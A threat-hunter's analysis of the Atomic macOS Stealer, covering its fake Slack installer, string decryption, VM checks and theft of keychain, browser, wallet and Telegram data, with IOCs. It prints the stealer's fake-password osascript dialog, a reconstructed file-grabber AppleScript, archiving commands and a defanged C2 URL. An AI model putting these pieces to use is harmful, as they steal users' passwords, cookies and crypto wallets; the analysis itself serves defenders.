Breaking down Atomic MacOS Stealer (AMOS)

Background

It was normal day in the life of a Threat Hunter. As I scrolled through my hunting feeds and found an interesting sample Slack.dmg file. I initially suspected it would be red teaming payload but further analysis revealed it to be an Atomic Stealer.

The Atomic MacOS Stealer (AMOS) appeared around mid-2023. It is available for sale in underground forums and Telegram channels. Further details about its functionality can be found in the below malware’s advertisement.

SYSTEM :
- Collecting notes from Notes
- Keychain (Dump of all saved user passwords)
- SystemInfo (Full system information)
- MacOS Password
- Hidden console when launching the

BROWSERS software :
- Safari (Cookies)
- Chrome (Autofills, Passwords, Cookies, Wallets, Cards)
- Firefox (Autofills, Cookies)
- Brave (Cookies, Passwords, Autofills, Wallets, Cards)
- Edge (Cookies, Passwords, Autofills, Wallets, Cards) )
- Vivaldi (Cookies, Passwords, Autofills, Wallets, Cards)
- Yandex (Cookies, Autofills, Wallets, Cards)
- Opera (Cookies, Autofills, Wallets, Cards)
- OperaGX (Cookies, Autofills, Wallets, Cards)

WALLETS + PLUGINS :
- Electrum
- Binance
- Exodus
- Atomic
- Coinomi
- More than 60 plugins, including the most popular

———————————
GOOGLE ANTI-LOGIN
- Google Restore - Google anti-login has been implemented.
———————————
- Convenient web panel
- Beautiful dmg installer
- Tapping in telegram (log + notification)

Analysis

The Slack.DMG is a Apple disk image, common ways the mac applications are distributed. Further examining the contents by mounting it as volume, it contained Mach-O binary inside it. It’s a universal binary, which contains two or more architectures - x86_64 and arm64.(Targets both Intel and Apple chips). It’s adhoc signed which means it doesn’t contain any cryptographic proof.

file /Volumes/Slack/Slack 
/Volumes/Slack/Slack: Mach-O universal binary with 2 architectures: [x86_64:Mach-O 64-bit executable x86_64] [arm64:Mach-O 64-bit executable arm64]
/Volumes/Slack/Slack (for architecture x86_64): Mach-O 64-bit executable x86_64
/Volumes/Slack/Slack (for architecture arm64): Mach-O 64-bit executable arm64

codesign -dvv /Volumes/Slack/Slack 
Executable=/Volumes/Slack/Slack
Identifier=setup-5555494478afc55e7c5733d690ad555c942bbdb1
Format=Mach-O universal (x86_64 arm64)
CodeDirectory v=20400 size=1607 flags=0x2(adhoc) hashes=39+7 location=embedded
Signature=adhoc
Info.plist=not bound
TeamIdentifier=not set
Sealed Resources=none
Internal requirements count=0 size=12

The extracted strings did not provide any valuable information, suggesting that they are encrypted in the recent campaign. This observation was previously highlighted by Phil Stokes in a tweet. The threat Actors are aware of the detection logics and trying to evade it.

Installer Image

There was also Installer background image in the mounted Volume of the DMG. The Installer background image also displays guidelines for launching the application by right clicking and opening the app, which is a tactic used to circumvent warnings provided by GateKeeper, an integrated security feature in Apple’s operating system. Security researchers have observed this approach in various adware families targeting macOS users.

Mach-O binary analysis

The function names in the binary indicate that it was compiled using C++. You can confirm it looking at shared Library used by the binary using otool (which is included with Xcode Developer tools). You can find the use of libc++.1.dylib in the snippets below:

otool -L /Volumes/Slack/Slack 
/Volumes/Slack/Slack:
 /usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 1600.157.0)
 /usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1336.61.1)

Looking at the entry point we can see thread function “hmmm” was created.

String Encryption

At the beginning of the thread function, there was stack strings but was in encrypted format. The encryption method involved using SSE (Streaming SIMD Extensions) to copy the bytes to XMM registers and then to the stack, followed by XOR decryption. The key is the first byte of all the encrypted strings, but in this case it was constant 0x41 for all the strings. By just stepping through the debugger you can get the decrypted versions.

Anti-VM/ Anti-Debug

The shell-command was executed AppleScript which hides the Terminal from the foreground. It was hindering my debugging process but not sure if this was intended anti-debug feature. Monitoring for the execution of AppleScript could be a valuable for detection or hunting as well.

osascript -e 'tell application "Terminal" to set visible of front window to false

Then Series shell-command spawned to gather system Hardware, Display and Software information and all the data were logged to a file called Sysinfo.txt.

system_profiler SPHardwareDataType
system_profiler SPDisplaysDataType
sw_vers

After collecting the data, the malware searches for specific strings such as “VirtualBox,” “Parallels,” and “Apple Virtual Machine” in the collected data. If any of these strings are found, the malware terminates itself.

User Password Extraction

The Atomic Stealer extracts user login password by masquerading as Privilege Helper using Apple Script. It generates fake dialog box with title “System Preferences”, tricking the victim to enter the password.

osascript -e 'display dialog "To launch the application, you need to update the system settings \n\nPlease enter your password." with title "System Preferences" with icon caution default answer "" giving up after 30 with hidden answer'

When password is entered, it is verified if it’s correct using the dscl — Directory Service command line utility. The following is the command which performs an authentication test without executing any operations. If the password is verified, it is saved to a file named “password-entered” in the User directory.

dscl /Local/Default -authonly {user_name}

The stealer copies the login.keychain-db to a file named “login-keychain” in the User directory. Later, the extracted files are zipped and exfiltrated to C2 server.

/Users/{user_name}/Library/Keychains/login.keychain-db

Browser

The Atomic Stealer is grabs sensitive data like Autofills, Passwords, Cookies, and Wallets from Chromium-based browsers and FireFox . It specifically targets Chrome, Brave, Edge, Vivaldi, Yandex, Opera, and OperaGX Brave-Browser.

For Firefox, it collects the following files:

• cookies.sqlite: This file in the user’s profile directory stores cookies between sessions.
• formhistory.sqlite: Used by Firefox users to store autocomplete form data.
• logins.json: Stores encrypted logins.

Crypto Wallets:
The Atomic Stealer collects file and folders from Digital Crypto Wallet Applications such as Coinbase, Exodus, Electrum, Coinomi, Guarda, Wasabi, Atomic, and Ledger. Moreover, it includes hundreds of browser extension IDs for wallets, enabling it to collect data from them as well.

Exodus/exodus.wallet/
electrum/wallets/
Coinomi/wallets/
Guarda/Local Storage/leveldb/
walletwasabi/client/Wallets/
atomic/Local Stveldb/
Ledger Live/

Telegram data from the below directory were also collected:

./Telegram Desktop/tdata

File Grabber

File Grabber is a new functionality added in the malware, it’s an AppleScript as shown in the code snippet below. It simply uses Finder application to gather data. It collects the Safari cookie file, Cookies.binarycookies, and also targets the macOS Notes database, NoteStore.sqlite. Additionally, it gathers files from the User Desktop and Document folders that match specific extensions (txt, docx, rtf, doc, wallet, keys, key).

Here is the reconstructed AppleScript:

set baseFolderPath to (path to home folder as text) & "1621866055"
set fileGrabberFolderPath to (path to home folder as text) & "1621866055:FileGrabber:"
tell application "Finder"
set username to short user name of (system info)
try 
     if not (exists folder fileGrabberFolderPath) then make new folder at folder baseFolderPath with properties {
        name:"FileGrabber"
    }
end 
if set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")
try 
    duplicate file "Cookies.binarycookies" of folder safariFolder to folder baseFolderPath with replacing
end try 

set homePath to path to home folder as string set sourceFilePath to homePath & "Library:Group Containers:group.com.apple.notes:NoteStore.sqlite"
set sourceFile to file sourceFilePath try duplicate sourceFile to folder baseFolderPath 

end try

set extensionsList to {
    "txt", "docx", "rtf", "doc", "wallet", "keys", "key"
}

set desktopFiles to every file of desktop
set documentsFiles to every file of folder "Documents" of (path to home folder)
repeat with aFile in (desktopFiles & documentsFiles)
set fileExtension to name extension of aFile 
if fileExtension is in extensionsList
then
set fileSize to size of aFile if fileSize ?.? 51200 
then duplicate aFile to folder fileGrabberFolderPath with replacing 
end if 
end if 
end repeat
end try 
end tell

Exfiltration

Archive Collected Data
All the collected data is stored in the random folder under User directory. Before being exfiltrated, it is archived using the ditto utility with the following command:

ditto -c -k --sequesterRsrc --keepParent /Users/{UserName}/{10 random digits} /Users/{UserName}/{10 random digits}.zip --norsrc --noextattr

C2
The stolen data are posted C2 server in base64 encoded format. The C2 address is XOR encrypted and bas64 encoded as well. The data is posted to the below URL

 hxxp://5[.]42.65.107/joinsystem

Indicators of Compromise (IOCs)

The Atomic Stealer disguises itself as office collaboration or productivity applications in recent campaigns.

008afff67ec8e20b9164c74a5e962dc520466b2d Slack.DMG
1f763ac756ed13f0c08d3ef3c27654a62d3204e9 Slack_MacOS.dmg
474a0150b3eac4a7242ffdcbd32ad9b478e25017 ZoomSetup.dmg
28566de2edf33187ee6de111360d2e4d0fa30be4 Notion.dmg
2d494cdc9d58d3c64ad1dd0b8dd36a539704a47e GoodNotes.dmg
90dd36ac3a4896b51ae89b298f2cdc949631d4a7 TradingView.dmg
4a2f08ae92e00b60381d4c3b1ab2da96b6c9d232 Trello.dmg
68ed3cb921454d7f0e7fde46aea1831ba6c3b4bb Active-App/CrackSetup.dmg
985340ec68c3ccf0a2a4d6fae42b4b121de1db7a CrackSetup.dmg
fb50216347e2017592d2915c21eec50bd2e5facb Notion.dmg
300d2951e80c9c2eef51d34155fb98f034f9d0d4 parallels_mac.dmg
5[.]42.65.107                            C2

Conclusion

The analysis of the Atomic MacOS Stealer (AMOS) reveals a sophisticated malware with evident efforts to evade current XProtect signatures. It shows threats targeting macOS are constantly evolving. It is crucial for users and organizations to stay vigilant and adopt proactive security measures

Ongoing research and analysis are essential to stay ahead of cyber adversaries and safeguard against potential breaches.